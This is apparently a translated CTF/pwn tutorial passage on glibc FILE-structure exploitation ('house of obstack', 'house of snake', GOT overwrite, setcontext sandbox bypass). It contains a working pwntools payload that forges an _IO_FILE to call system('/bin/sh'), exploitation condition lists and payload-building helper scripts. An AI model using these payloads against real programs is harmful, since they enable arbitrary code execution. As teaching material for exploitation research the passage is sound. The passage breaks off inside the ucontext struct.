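In demo(), next_free becomes 0x100, so new_size = 0x108 + 0x20 + 0 + 100 = 0x18c and chunkfun receives (0xdead, 0x18c).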

[[./houseofobstack1.png]]

The exp is as follows:

fake_io_addr = heap_addr + 0x1390
obstack_ptr = fake_io_addr + 0x30
fake_io_file = b''
fake_io_file = fake_io_file.ljust(0x58,b'\x00')
fake_io_file += p64(system_addr) # function to call (obstack->chunkfun)
fake_io_file += p64(0) # obstack->freefun
fake_io_file += p64(fake_io_addr+0xe8) # rdi of the called function (obstack->extra_arg)
fake_io_file += p64(1) # obstack->use_extra_arg=1
fake_io_file += p64(heap_addr+0x2000) # _IO_lock_t *_lock;
fake_io_file = fake_io_file.ljust(0xc8,b'\x00')
fake_io_file += p64(IO_obstack_jumps_addr + 0x20) # vtable shifted by 0x20 so the overflow slot hits _IO_obstack_xsputn
fake_io_file += p64(obstack_ptr) # struct obstack *obstack
print(hex(len(fake_io_file))) # largebin attack, so 0xd8 = 0xe8 - 0x10
# pause()

# contents stored at the address passed as rdi
payload = fake_io_file+ b'/bin/sh\x00'
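Because a wrong offset in this payload only shows up as a crash, the layout can be checked offline. A minimal sketch, assuming made-up addresses and replacing pwntools' p64 with struct.pack; `build`, `qword_at` and `demo` are hypothetical helpers. It rebuilds the payload and reads fields back by absolute address, remembering that the payload lands at fake_io_addr + 0x10.

```python
import struct


def p64(x):
    return struct.pack("<Q", x)


def build(heap_addr, system_addr, obstack_jumps_addr):
    """Rebuild the house of obstack payload from the exp above."""
    fake_io_addr = heap_addr + 0x1390
    obstack_ptr = fake_io_addr + 0x30
    f = b"".ljust(0x58, b"\x00")
    f += p64(system_addr)                # obstack->chunkfun
    f += p64(0)                          # obstack->freefun
    f += p64(fake_io_addr + 0xe8)        # obstack->extra_arg -> "/bin/sh"
    f += p64(1)                          # obstack->use_extra_arg
    f += p64(heap_addr + 0x2000)         # FILE->_lock
    f = f.ljust(0xc8, b"\x00")
    f += p64(obstack_jumps_addr + 0x20)  # vtable
    f += p64(obstack_ptr)                # _IO_obstack_file->obstack
    return fake_io_addr, f + b"/bin/sh\x00"


def qword_at(fake_io_addr, payload, addr):
    """Read the qword at absolute address addr (payload starts at +0x10)."""
    return struct.unpack_from("<Q", payload, addr - fake_io_addr - 0x10)[0]


def demo():
    return build(0x555555559000, 0x7ffff7e50d70, 0x7ffff7fb0000)
```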

house of snake(house of obstack plus)

Starting with libc 2.37, house of obstack turns into house of snake: _IO_obstack_jumps was removed, but a new _IO_jump_t table, _IO_printf_buffer_as_file_jumps, was added:

static const struct _IO_jump_t _IO_printf_buffer_as_file_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, NULL),
JUMP_INIT(overflow, __printf_buffer_as_file_overflow),
JUMP_INIT(underflow, NULL),
JUMP_INIT(uflow, NULL),
JUMP_INIT(pbackfail, NULL),
JUMP_INIT(xsputn, __printf_buffer_as_file_xsputn),
JUMP_INIT(xsgetn, NULL),
JUMP_INIT(seekoff, NULL),
JUMP_INIT(seekpos, NULL),
JUMP_INIT(setbuf, NULL),
JUMP_INIT(sync, NULL),
JUMP_INIT(doallocate, NULL),
JUMP_INIT(read, NULL),
JUMP_INIT(write, NULL),
JUMP_INIT(seek, NULL),
JUMP_INIT(close, NULL),
JUMP_INIT(stat, NULL),
JUMP_INIT(showmanyc, NULL),
JUMP_INIT(imbue, NULL)
};
__printf_buffer_as_file_overflow, together with the helper __printf_buffer_has_failed it uses, is defined as follows:
static inline bool __attribute_warn_unused_result__
__printf_buffer_has_failed(struct __printf_buffer *buf) {
return buf->mode == __printf_buffer_mode_failed;
}

static int
__printf_buffer_as_file_overflow(FILE *fp, int ch) {
struct __printf_buffer_as_file *file = (struct __printf_buffer_as_file *) fp;

__printf_buffer_as_file_commit(file);

/* EOF means only a flush is requested. */
if (ch != EOF)
__printf_buffer_putc(file->next, ch);

/* Ensure that flushing actually produces room. */
if (!__printf_buffer_has_failed(file->next)
&& file->next->write_ptr == file->next->write_end)
__printf_buffer_flush(file->next);

...
}
__printf_buffer_as_file_overflow first casts the FILE structure to the __printf_buffer_as_file type; the relevant definitions are:
struct __printf_buffer
{
char *write_base;
char *write_ptr;
char *write_end;
uint64_t written;
enum __printf_buffer_mode mode;
};

struct __printf_buffer_as_file
{
/* Interface to libio. */
FILE stream;
const struct _IO_jump_t *vtable;

/* Pointer to the underlying buffer. */
struct __printf_buffer *next;
};
It then calls __printf_buffer_as_file_commit, which performs some checks:
static void
__printf_buffer_as_file_commit (struct __printf_buffer_as_file *file)
{
/* Check that the write pointers in the file stream are consistent
with the next buffer. */
assert (file->stream._IO_write_ptr >= file->next->write_ptr);
assert (file->stream._IO_write_ptr <= file->next->write_end);
assert (file->stream._IO_write_base == file->next->write_base);
assert (file->stream._IO_write_end == file->next->write_end);

file->next->write_ptr = file->stream._IO_write_ptr;
}
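Next, whether __printf_buffer_putc is called depends on whether ch is EOF. In FSOP, _IO_flush_all_lockp reaches the overflow function in the vtable through _IO_OVERFLOW (fp, EOF), so the ch argument of __printf_buffer_as_file_overflow is EOF. Even if __printf_buffer_putc were called, it only does some arithmetic on the recorded pointers and counters, so it needs little attention.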

After that, __printf_buffer_flush is called, provided that file->next->mode != __printf_buffer_mode_failed and file->next->write_ptr == file->next->write_end.

__printf_buffer_flush is defined as follows. It checks again that file->next->mode != __printf_buffer_mode_failed, then calls __printf_buffer_do_flush with file->next as the argument:

#define Xprintf(n) __printf_##n
#define Xprintf_buffer_flush Xprintf (buffer_flush)
#define Xprintf_buffer Xprintf (buffer)

bool
Xprintf_buffer_flush (struct Xprintf_buffer *buf)
{
if (__glibc_unlikely (Xprintf_buffer_has_failed (buf)))
return false;

Xprintf (buffer_do_flush) (buf); // __printf_buffer_do_flush(buf)
...
}

If file->next->mode == __printf_buffer_mode_obstack (11), __printf_buffer_do_flush calls __printf_buffer_flush_obstack:

static void
__printf_buffer_do_flush (struct __printf_buffer *buf)
{
switch (buf->mode)
{
...
case __printf_buffer_mode_obstack:
__printf_buffer_flush_obstack ((struct __printf_buffer_obstack *) buf);
return;
}
...
}
The __printf_buffer_obstack structure is defined as:
struct __printf_buffer_obstack
{
struct __printf_buffer base;
struct obstack *obstack;
char ch;
};
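The address that write_ptr has to match can be derived from this layout. A sketch with ctypes, assuming x86_64 and an int-sized enum for mode; the class names and `required_write_ptr` are illustrative only.

```python
import ctypes


class PrintfBuffer(ctypes.Structure):
    """struct __printf_buffer (enum mode assumed to be int-sized)."""
    _fields_ = [
        ("write_base", ctypes.c_void_p),
        ("write_ptr", ctypes.c_void_p),
        ("write_end", ctypes.c_void_p),
        ("written", ctypes.c_uint64),
        ("mode", ctypes.c_int),
    ]


class PrintfBufferObstack(ctypes.Structure):
    """struct __printf_buffer_obstack."""
    _fields_ = [
        ("base", PrintfBuffer),
        ("obstack", ctypes.c_void_p),
        ("ch", ctypes.c_char),
    ]


def required_write_ptr(buf_addr):
    """Value buf->base.write_ptr must hold for obstack_1grow: &buf->ch + 1."""
    return buf_addr + PrintfBufferObstack.ch.offset + 1
```

So with file->next at address A, mode is read from A + 0x20, the obstack pointer from A + 0x28, and write_ptr must equal A + 0x31.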
If buf->base.write_ptr == &buf->ch + 1, __printf_buffer_flush_obstack executes the obstack_1grow macro:
void
__printf_buffer_flush_obstack (struct __printf_buffer_obstack *buf)
{
...
if (buf->base.write_ptr == &buf->ch + 1)
{
obstack_1grow (buf->obstack, buf->ch);
...
}
...
}
The obstack_1grow macro expands as follows; it calls _obstack_newchunk with buf->obstack as the argument.
Declared in: obstack.h
Definition:
# define obstack_1grow(OBSTACK, datum) \
__extension__ \
({ struct obstack *__o = (OBSTACK); \
if (__o->next_free + 1 > __o->chunk_limit) \
_obstack_newchunk (__o, 1); \
obstack_1grow_fast (__o, datum); \
(void) 0; })
After substitution:
({
struct obstack *__o = (buf->obstack);
if (__o->next_free + 1 > __o->chunk_limit)_obstack_newchunk(__o, 1);
(*((__o)->next_free)++ = (buf->ch));
(void) 0;
})
_obstack_newchunk executes the CALL_CHUNKFUN macro, just like the house of 琴瑟琵琶 chain above:
void
_obstack_newchunk (struct obstack *h, int length)
{
...
struct _obstack_chunk *new_chunk;
...
new_chunk = CALL_CHUNKFUN (h, new_size);
...
}
In summary:

  1. In __printf_buffer_as_file_overflow:
      • file->next->mode != __printf_buffer_mode_failed && file->next->write_ptr == file->next->write_end (after the commit, file->next->write_ptr equals file->stream._IO_write_ptr)
  2. In __printf_buffer_as_file_commit:
      • file->stream._IO_write_ptr >= file->next->write_ptr
      • file->stream._IO_write_ptr <= file->next->write_end
      • file->stream._IO_write_base == file->next->write_base
      • file->stream._IO_write_end == file->next->write_end
  3. In __printf_buffer_flush:
      • file->next->mode == __printf_buffer_mode_obstack
  4. In __printf_buffer_flush_obstack:
      • buf->base.write_ptr == &buf->ch + 1 <==> file->next->write_ptr == (char *) file->next + 0x30 + 1
  5. In the obstack_1grow macro, with ob = ((struct __printf_buffer_obstack *) file->next)->obstack:
      • ob->next_free + 1 > ob->chunk_limit
      • (h)->use_extra_arg != 0 <==> ob->use_extra_arg != 0
  6. Finally, ob->chunkfun(ob->extra_arg, new_size) is called.

[[./houseofsnake1.png]]
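These conditions can be encoded as a checker to validate a forged layout before sending it. A minimal sketch that models only the conditions listed above, not the full functions: the three dicts stand for the fake FILE, file->next and its obstack, the value 11 for __printf_buffer_mode_obstack is taken from the text, 0 for __printf_buffer_mode_failed is assumed (it is the first enumerator), and the function names are hypothetical.

```python
MODE_FAILED = 0     # __printf_buffer_mode_failed (first enumerator, assumed 0)
MODE_OBSTACK = 11   # __printf_buffer_mode_obstack, value given above
CH_OFFSET = 0x30    # offsetof(struct __printf_buffer_obstack, ch) on x86_64


def snake_reaches_chunkfun(stream, nxt, ob, next_addr):
    """True if __printf_buffer_as_file_overflow(fp, EOF) would end in
    ob->chunkfun(ob->extra_arg, ...). next_addr is the address of file->next."""
    # __printf_buffer_as_file_commit assertions
    if not nxt["write_ptr"] <= stream["_IO_write_ptr"] <= nxt["write_end"]:
        return False
    if stream["_IO_write_base"] != nxt["write_base"]:
        return False
    if stream["_IO_write_end"] != nxt["write_end"]:
        return False
    write_ptr = stream["_IO_write_ptr"]  # commit copies it into file->next
    # overflow: not failed and buffer full -> __printf_buffer_flush
    if nxt["mode"] == MODE_FAILED or write_ptr != nxt["write_end"]:
        return False
    # __printf_buffer_do_flush must dispatch to the obstack flusher
    if nxt["mode"] != MODE_OBSTACK:
        return False
    # __printf_buffer_flush_obstack: write_ptr == &buf->ch + 1
    if write_ptr != next_addr + CH_OFFSET + 1:
        return False
    # obstack_1grow needs a new chunk; CALL_CHUNKFUN must pass extra_arg
    return ob["next_free"] + 1 > ob["chunk_limit"] and ob["use_extra_arg"] != 0


def demo(mode=MODE_OBSTACK):
    """Hypothetical layout with file->next at 0x5000."""
    a = 0x5000
    nxt = {"write_base": 0, "write_ptr": 0, "write_end": a + 0x31, "mode": mode}
    stream = {"_IO_write_base": 0, "_IO_write_ptr": a + 0x31,
              "_IO_write_end": a + 0x31}
    ob = {"next_free": 0, "chunk_limit": 0, "use_extra_arg": 1}
    return snake_reaches_chunkfun(stream, nxt, ob, a)
```

Note how conditions 1 and 4 together force file->stream._IO_write_ptr, file->stream._IO_write_end and file->next->write_end to all equal (char *) file->next + 0x31.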

house of 秦月汉关

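Because puts calls strlen at the very beginning, we can follow puts to find the real strlen. puts calls strlen through a PLT entry, and that PLT stub jumps through a slot shown as <*ABS*@got.plt>; the real strlen address is stored there, and overwriting it gets a shell.

house of 魑魅魍魉

Normally there is only one jump table of each kind, but _IO_helper_jumps is special. As shown below, the table differs depending on COMPILE_WPRINTF, and libc presumably compiles this code twice, so two _IO_helper_jumps tables can be seen in memory, one of each kind. The COMPILE_WPRINTF == 0 version is generated first and the COMPILE_WPRINTF == 1 version second.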

#ifdef COMPILE_WPRINTF
static const struct _IO_jump_t _IO_helper_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT (finish, _IO_wdefault_finish),
JUMP_INIT (overflow, _IO_helper_overflow),
JUMP_INIT (underflow, _IO_default_underflow),
JUMP_INIT (uflow, _IO_default_uflow),
JUMP_INIT (pbackfail, (_IO_pbackfail_t) _IO_wdefault_pbackfail),
JUMP_INIT (xsputn, _IO_wdefault_xsputn),
JUMP_INIT (xsgetn, _IO_wdefault_xsgetn),
JUMP_INIT (seekoff, _IO_default_seekoff),
JUMP_INIT (seekpos, _IO_default_seekpos),
JUMP_INIT (setbuf, _IO_default_setbuf),
JUMP_INIT (sync, _IO_default_sync),
JUMP_INIT (doallocate, _IO_wdefault_doallocate),
JUMP_INIT (read, _IO_default_read),
JUMP_INIT (write, _IO_default_write),
JUMP_INIT (seek, _IO_default_seek),
JUMP_INIT (close, _IO_default_close),
JUMP_INIT (stat, _IO_default_stat)
};
#else
static const struct _IO_jump_t _IO_helper_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT (finish, _IO_default_finish),
JUMP_INIT (overflow, _IO_helper_overflow),
JUMP_INIT (underflow, _IO_default_underflow),
JUMP_INIT (uflow, _IO_default_uflow),
JUMP_INIT (pbackfail, _IO_default_pbackfail),
JUMP_INIT (xsputn, _IO_default_xsputn),
JUMP_INIT (xsgetn, _IO_default_xsgetn),
JUMP_INIT (seekoff, _IO_default_seekoff),
JUMP_INIT (seekpos, _IO_default_seekpos),
JUMP_INIT (setbuf, _IO_default_setbuf),
JUMP_INIT (sync, _IO_default_sync),
JUMP_INIT (doallocate, _IO_default_doallocate),
JUMP_INIT (read, _IO_default_read),
JUMP_INIT (write, _IO_default_write),
JUMP_INIT (seek, _IO_default_seek),
JUMP_INIT (close, _IO_default_close),
JUMP_INIT (stat, _IO_default_stat)
};
#endif

Likewise, helper_file differs with COMPILE_WPRINTF; the difference is whether struct _IO_wide_data _wide_data has to be forged.

struct helper_file
{
struct _IO_FILE_plus _f;
#ifdef COMPILE_WPRINTF
struct _IO_wide_data _wide_data;
#endif
FILE *_put_stream;
#ifdef _IO_MTSAFE_IO
_IO_lock_t lock;
#endif
};

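Likewise, _IO_helper_overflow also exists twice in memory. Testing showed that with the COMPILE_WPRINTF == 0 version, s->_IO_write_base becomes the largebin chunk's fd_nextsize pointer during the attack, so it is forcibly overwritten and cannot be controlled. For convenience we use the _IO_helper_overflow generated with COMPILE_WPRINTF == 1. Its role in the attack is to control the three arguments of _IO_default_xsputn.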

static int _IO_helper_overflow (FILE *s, int c)
{
FILE *target = ((struct helper_file*) s)->_put_stream;
#ifdef COMPILE_WPRINTF
int used = s->_wide_data->_IO_write_ptr - s->_wide_data->_IO_write_base;
if (used)
{
// Use this path: all three arguments are clearly under our control.
size_t written = _IO_sputn (target, s->_wide_data->_IO_write_base, used);
if (written == 0 || written == WEOF)
return WEOF;
__wmemmove (s->_wide_data->_IO_write_base,
s->_wide_data->_IO_write_base + written,
used - written);
s->_wide_data->_IO_write_ptr -= written;
}
#else
// On this path, _IO_write_ptr sits on the largebin chunk's bk_nextsize pointer
int used = s->_IO_write_ptr - s->_IO_write_base;
if (used)
{
size_t written = _IO_sputn (target, s->_IO_write_base, used);
if (written == 0 || written == EOF)
return EOF;
memmove (s->_IO_write_base, s->_IO_write_base + written,
used - written);
s->_IO_write_ptr -= written;
}
#endif
return PUTC (c, s);
}

From the function above, when size_t written = _IO_sputn (target, s->_wide_data->_IO_write_base, used) executes:

  • FILE *target = ((struct helper_file*) s)->_put_stream is controllable
  • s->_wide_data->_IO_write_base is controllable
  • int used = s->_wide_data->_IO_write_ptr - s->_wide_data->_IO_write_base is controllable

so all three arguments are under our control. Then, by pointing the vtable of ((struct helper_file*) s)->_put_stream at _IO_str_jumps, the call goes to _IO_default_xsputn.

Note that s->_wide_data->_IO_write_ptr and s->_wide_data->_IO_write_base are of type wchar_t *, so used is actually ((char *) s->_wide_data->_IO_write_ptr - (char *) s->_wide_data->_IO_write_base) >> 2. (On Linux, wide characters are usually represented in UTF-32, which uses 32 bits per character, so wchar_t is normally 4 bytes.)
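A tiny sketch of how the byte distance between the forged wide pointers turns into `used`, assuming a 4-byte wchar_t as stated above; `helper_used` is a hypothetical name.

```python
WCHAR_SIZE = 4  # sizeof(wchar_t) on x86_64 Linux (UTF-32)


def helper_used(wide_write_base, wide_write_ptr):
    """`used` in the COMPILE_WPRINTF _IO_helper_overflow: a wchar_t * difference,
    i.e. the byte distance between the two pointers divided by 4."""
    byte_distance = wide_write_ptr - wide_write_base
    return byte_distance // WCHAR_SIZE
```

For example, the 魑魅魍魉 exp sets the byte distance to 0x80*8, so used, and therefore n in _IO_default_xsputn, is 0x100.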

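_IO_default_xsputn has quite a few checks to bypass. Its role in the attack is to call __mempcpy twice: the first call uses the arbitrary write to overwrite the GOT entry used by __mempcpy, and the second call hijacks control flow.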

size_t
_IO_default_xsputn (FILE *f, const void *data, size_t n)
{
const char *s = (char *) data;
size_t more = n;
if (more <= 0)
return 0;
for (;;)
{
/* Space available. */
if (f->_IO_write_ptr < f->_IO_write_end)
{
size_t count = f->_IO_write_end - f->_IO_write_ptr;
// need more > count so that __mempcpy can run again
if (count > more)
count = more;
// need count > 20
if (count > 20)
{
// Use this for house of 借刀杀人:
// overwrite the memcpy entry with setcontext,
// so the next pass achieves house of 一骑当千
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
s += count;
}
else if (count)
{
char *p = f->_IO_write_ptr;
ssize_t i;
for (i = count; --i >= 0; )
*p++ = *s++;
f->_IO_write_ptr = p;
}
// need more > count so that __mempcpy can run again
more -= count;
}
// get past the line below so that the for loop runs again
if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
break;
more--;
}
return n - more;
}
libc_hidden_def (_IO_default_xsputn)

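The conditions to satisfy are:

  • more > count, so that the loop comes back and runs __mempcpy again. By then f->_IO_write_ptr has been changed by _IO_str_overflow to point at the target buffer (the "/bin/sh" string in a system-based variant), so count = f->_IO_write_end - f->_IO_write_ptr may be huge, making count > more; count is then reduced to more, so the second pass requires more > 20. Since the first pass already executed more -= count and more--, this means more ≥ count + 1 + 21.
  • count > 20, so count must be at least 21.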
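The two __mempcpy calls can be traced with a small Python model. A sketch under these assumptions: addresses are made-up integers, the overflow callback stands in for _IO_str_overflow already redirecting _IO_write_ptr to _IO_read_ptr + 1, and `default_xsputn` and `demo` are hypothetical names.

```python
EOF = -1


def default_xsputn(f, s, n, overflow, log):
    """Trace of _IO_default_xsputn. Every __mempcpy(dst, src, count) is
    appended to log; the byte-by-byte branch (count <= 20) only moves the
    pointers here. overflow(f) models _IO_OVERFLOW and returns EOF to stop."""
    more = n
    if more <= 0:
        return 0
    while True:
        if f["_IO_write_ptr"] < f["_IO_write_end"]:
            count = min(f["_IO_write_end"] - f["_IO_write_ptr"], more)
            if count > 20:
                log.append((f["_IO_write_ptr"], s, count))
            f["_IO_write_ptr"] += count
            s += count
            more -= count
        if more == 0:
            break
        ret = overflow(f)
        s += 1  # the *s++ inside the _IO_OVERFLOW call
        if ret == EOF:
            break
        more -= 1
    return n - more


def demo():
    """Hypothetical addresses: memcpy GOT entry at 0x7000, ucontext at 0x5210."""
    log = []
    f = {"_IO_write_ptr": 0x7000, "_IO_write_end": 0x7000 + 0x28}

    def str_overflow(fp):
        fp["_IO_write_ptr"] = 0x520f + 1  # _IO_read_ptr, then the ++ write
        return ord("A")

    default_xsputn(f, 0x5200, 0x100, str_overflow, log)
    return log
```

With n = 0x100 and count = 0x28, the first call writes 0x28 bytes into the GOT entry; after more -= 0x28 and more--, the second call starts at the redirected _IO_write_ptr (0x5210) with count = more = 0xd7 > 20.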

First call: __mempcpy (f->_IO_write_ptr, s, count);

  • _IO_write_ptr is the GOT entry used by __mempcpy
  • s points to the data to write

Second call: __mempcpy (f->_IO_write_ptr, s, count)

  • the check if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF) must be passed; how to do so is explained next
  • f->_IO_write_ptr is rdi, s is rsi, count is rdx

Likewise, _IO_str_overflow has quite a few checks to bypass. Its role is to control fp->_IO_write_ptr, and thus the first argument of __mempcpy in the second iteration of _IO_default_xsputn.

int _IO_str_overflow (FILE *fp, int c)
{
int flush_only = c == EOF;
size_t pos;
if (fp->_flags & _IO_NO_WRITES)
return flush_only ? 0 : EOF;
// must enter this branch to control fp->_IO_write_ptr; _flags == 0x400
if ((fp->_flags & _IO_TIED_PUT_GET) && !(fp->_flags & _IO_CURRENTLY_PUTTING))
{
fp->_flags |= _IO_CURRENTLY_PUTTING;
fp->_IO_write_ptr = fp->_IO_read_ptr; // point fp->_IO_write_ptr at &"/bin/sh" - 1, the first argument of the next memcpy (system).
fp->_IO_read_ptr = fp->_IO_read_end;
}
pos = fp->_IO_write_ptr - fp->_IO_write_base;
// must not enter: make _IO_blen (fp) ((fp)->_IO_buf_end - (fp)->_IO_buf_base) large enough.
if (pos >= (size_t) (_IO_blen (fp) + flush_only))
{
if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
return EOF;
else
{
char *new_buf;
char *old_buf = fp->_IO_buf_base;
size_t old_blen = _IO_blen (fp);
size_t new_size = 2 * old_blen + 100;
if (new_size < old_blen)
return EOF;
new_buf = malloc (new_size);
if (new_buf == NULL)
{
/* __ferror(fp) = 1; */
return EOF;
}
if (old_buf)
{
memcpy (new_buf, old_buf, old_blen);
free (old_buf);
/* Make sure _IO_setb won't try to delete _IO_buf_base. */
fp->_IO_buf_base = NULL;
}
memset (new_buf + old_blen, '\0', new_size - old_blen);

_IO_setb (fp, new_buf, new_buf + new_size, 1);
fp->_IO_read_base = new_buf + (fp->_IO_read_base - old_buf);
fp->_IO_read_ptr = new_buf + (fp->_IO_read_ptr - old_buf);
fp->_IO_read_end = new_buf + (fp->_IO_read_end - old_buf);
fp->_IO_write_ptr = new_buf + (fp->_IO_write_ptr - old_buf);

fp->_IO_write_base = new_buf;
fp->_IO_write_end = fp->_IO_buf_end;
}
}

if (!flush_only)
// fp->_IO_write_ptr is incremented by 1 here, so it must start 1 lower.
*fp->_IO_write_ptr++ = (unsigned char) c;
if (fp->_IO_write_ptr > fp->_IO_read_end)
fp->_IO_read_end = fp->_IO_write_ptr;
return c;
}
libc_hidden_def (_IO_str_overflow)

The conditions to satisfy are:

  • _flags = 0x400
  • fp->_IO_read_ptr = (rdi of the second __mempcpy (f->_IO_write_ptr, s, count)) - 1
  • (fp)->_IO_buf_end - (fp)->_IO_buf_base must be large enough; setting (fp)->_IO_buf_end = 0xFFFFFFFFFFFFFFF0 is usually sufficient
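A sketch of the part of _IO_str_overflow the attack relies on, assuming the libio flag values _IO_NO_WRITES = 0x8, _IO_TIED_PUT_GET = 0x400 and _IO_CURRENTLY_PUTTING = 0x800, and made-up addresses; `str_overflow` and `demo` are hypothetical names. It shows why _flags = 0x400 makes the next write start at _IO_read_ptr + 1, and how the size_t comparison against a huge _IO_buf_end keeps the malloc path closed.

```python
EOF = -1
_IO_NO_WRITES = 0x8
_IO_TIED_PUT_GET = 0x400
_IO_CURRENTLY_PUTTING = 0x800
MASK64 = (1 << 64) - 1


def str_overflow(fp, c):
    """Returns the new _IO_write_ptr, or None where the real function would
    return early or take the malloc path (not modeled)."""
    flush_only = c == EOF
    if fp["_flags"] & _IO_NO_WRITES:
        return None
    if (fp["_flags"] & _IO_TIED_PUT_GET) and not (fp["_flags"] & _IO_CURRENTLY_PUTTING):
        fp["_flags"] |= _IO_CURRENTLY_PUTTING
        fp["_IO_write_ptr"] = fp["_IO_read_ptr"]
        fp["_IO_read_ptr"] = fp["_IO_read_end"]
    # pos is size_t and the bound is cast to size_t: wrap both to 64 bits
    pos = (fp["_IO_write_ptr"] - fp["_IO_write_base"]) & MASK64
    bound = (fp["_IO_buf_end"] - fp["_IO_buf_base"] + flush_only) & MASK64
    if pos >= bound:
        return None
    if not flush_only:
        fp["_IO_write_ptr"] += 1  # *fp->_IO_write_ptr++ = c
    return fp["_IO_write_ptr"]


def demo(flags=0x400):
    """Hypothetical values from the second pass of _IO_default_xsputn."""
    fp = {"_flags": flags, "_IO_read_ptr": 0x520f, "_IO_read_end": 0,
          "_IO_write_base": 0x7000 - 0x20, "_IO_write_ptr": 0x7028,
          "_IO_buf_base": 0, "_IO_buf_end": MASK64}
    return str_overflow(fp, ord("A"))
```

Without the 0x400 flag the write pointer simply advances inside the GOT area (demo(0) gives 0x7029), so the second __mempcpy would not receive the ucontext address.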

[[./houseofkmwl1.png]]

house of 一骑当千

house of 一骑当千 is an attack technique that bypasses a sandbox using only setcontext.

The ucontext function family

int getcontext(ucontext_t *ucp);
int setcontext(const ucontext_t *ucp);
void makecontext(ucontext_t *ucp, void (*func)(), int argc, ...);
int swapcontext(ucontext_t *restrict oucp,const ucontext_t *restrict ucp);
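  1. getcontext saves the current user context
  2. setcontext restores (switches to) a user context
  3. makecontext modifies a context (normally one obtained with getcontext) so that func runs when that context is activated, which happens through setcontext or swapcontext
  4. swapcontext saves the current context and switches to another one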
setcontext

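Take setcontext, the one we care about. It is written in assembly, in /sysdeps/unix/sysv/linux/x86_64/setcontext.S. Stripping away the complicated macros, apart from the signal-mask system call (__NR_rt_sigprocmask) it is nothing but a series of loads. (The code is long, but I have left it untrimmed to show the whole picture; focus on the annotated lines, namely the popq %rdx comment and the setcontext+61 marker.)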

ENTRY(__setcontext)
/* Save argument since syscall will destroy it. */
pushq %rdi
cfi_adjust_cfa_offset(8)

/* Set the signal mask with
rt_sigprocmask (SIG_SETMASK, mask, NULL, _NSIG/8). */
leaq oSIGMASK(%rdi), %rsi
xorl %edx, %edx
movl $SIG_SETMASK, %edi
movl $_NSIG8,%r10d
movl $__NR_rt_sigprocmask, %eax
syscall
/* Pop the pointer into RDX. The choice is arbitrary, but
leaving RDI and RSI available for use later can avoid
shuffling values. */
popq %rdx # this is the key step that moves rdi into rdx.
cfi_adjust_cfa_offset(-8)
cmpq $-4095, %rax /* Check %rax for error. */
jae SYSCALL_ERROR_LABEL /* Jump to error handler if error. */

/* Restore the floating-point context. Not the registers, only the
rest. */
movq oFPREGS(%rdx), %rcx
fldenv (%rcx)
ldmxcsr oMXCSR(%rdx)


/* Load the new stack pointer, the preserved registers and
registers used for passing args. */
cfi_def_cfa(%rdx, 0)
cfi_offset(%rbx,oRBX)
cfi_offset(%rbp,oRBP)
cfi_offset(%r12,oR12)
cfi_offset(%r13,oR13)
cfi_offset(%r14,oR14)
cfi_offset(%r15,oR15)
cfi_offset(%rsp,oRSP)
cfi_offset(%rip,oRIP)
/* From here down is setcontext+61 */
movq oRSP(%rdx), %rsp
movq oRBX(%rdx), %rbx
movq oRBP(%rdx), %rbp
movq oR12(%rdx), %r12
movq oR13(%rdx), %r13
movq oR14(%rdx), %r14
movq oR15(%rdx), %r15

#if SHSTK_ENABLED
/* Check if shadow stack is enabled. */
testl $X86_FEATURE_1_SHSTK, %fs:FEATURE_1_OFFSET
jz L(no_shstk)

/* If the base of the target shadow stack is the same as the
base of the current shadow stack, we unwind the shadow
stack. Otherwise it is a stack switch and we look for a
restore token. */
movq oSSP(%rdx), %rsi
movq %rsi, %rdi

/* Get the base of the target shadow stack. */
movq (oSSP + 8)(%rdx), %rcx
cmpq %fs:SSP_BASE_OFFSET, %rcx
je L(unwind_shadow_stack)

L(find_restore_token_loop):
/* Look for a restore token. */
movq -8(%rsi), %rax
andq $-8, %rax
cmpq %rsi, %rax
je L(restore_shadow_stack)

/* Try the next slot. */
subq $8, %rsi
jmp L(find_restore_token_loop)

L(restore_shadow_stack):
/* Pop return address from the shadow stack since setcontext
will not return. */
movq $1, %rax
incsspq %rax

/* Use the restore stoken to restore the target shadow stack. */
rstorssp -8(%rsi)

/* Save the restore token on the old shadow stack. NB: This
restore token may be checked by setcontext or swapcontext
later. */
saveprevssp

/* Record the new shadow stack base that was switched to. */
movq (oSSP + 8)(%rdx), %rax
movq %rax, %fs:SSP_BASE_OFFSET

L(unwind_shadow_stack):
rdsspq %rcx
subq %rdi, %rcx
je L(skip_unwind_shadow_stack)
negq %rcx
shrq $3, %rcx
movl $255, %esi
L(loop):
cmpq %rsi, %rcx
cmovb %rcx, %rsi
incsspq %rsi
subq %rsi, %rcx
ja L(loop)

L(skip_unwind_shadow_stack):
movq oRSI(%rdx), %rsi
movq oRDI(%rdx), %rdi
movq oRCX(%rdx), %rcx
movq oR8(%rdx), %r8
movq oR9(%rdx), %r9

/* Get the return address set with getcontext. */
movq oRIP(%rdx), %r10

/* Setup finally %rdx. */
movq oRDX(%rdx), %rdx

/* Check if return address is valid for the case when setcontext
is invoked from __start_context with linked context. */
rdsspq %rax
cmpq (%rax), %r10
/* Clear RAX to indicate success. NB: Don't use xorl to keep
EFLAGS for jne. */
movl $0, %eax
jne L(jmp)
/* Return to the new context if return address valid. */
pushq %r10
ret

L(jmp):
/* Jump to the new context directly. */
jmp *%r10

L(no_shstk):
#endif
/* The following ret should return to the address set with
getcontext. Therefore push the address on the stack. */
movq oRIP(%rdx), %rcx
pushq %rcx

movq oRSI(%rdx), %rsi
movq oRDI(%rdx), %rdi
movq oRCX(%rdx), %rcx
movq oR8(%rdx), %r8
movq oR9(%rdx), %r9

/* Setup finally %rdx. */
movq oRDX(%rdx), %rdx

/* End FDE here, we fall into another context. */
cfi_endproc
cfi_startproc

/* Clear rax to indicate success. */
xorl %eax, %eax
ret
PSEUDO_END(__setcontext)

weak_alias (__setcontext, setcontext)

The ucontext structure

The ucontext functions take a ucontext_t structure; this is what is passed to setcontext in rdi. The structure is:

typedef struct ucontext_t
{
unsigned long int __ctx(uc_flags); // 1 word
struct ucontext_t *uc_link; // 1 word
stack_t uc_stack; // 3 words
mcontext_t uc_mcontext; // used by setcontext (1)
sigset_t uc_sigmask; // used by setcontext (2)
struct _libc_fpstate __fpregs_mem; // used by setcontext (3)
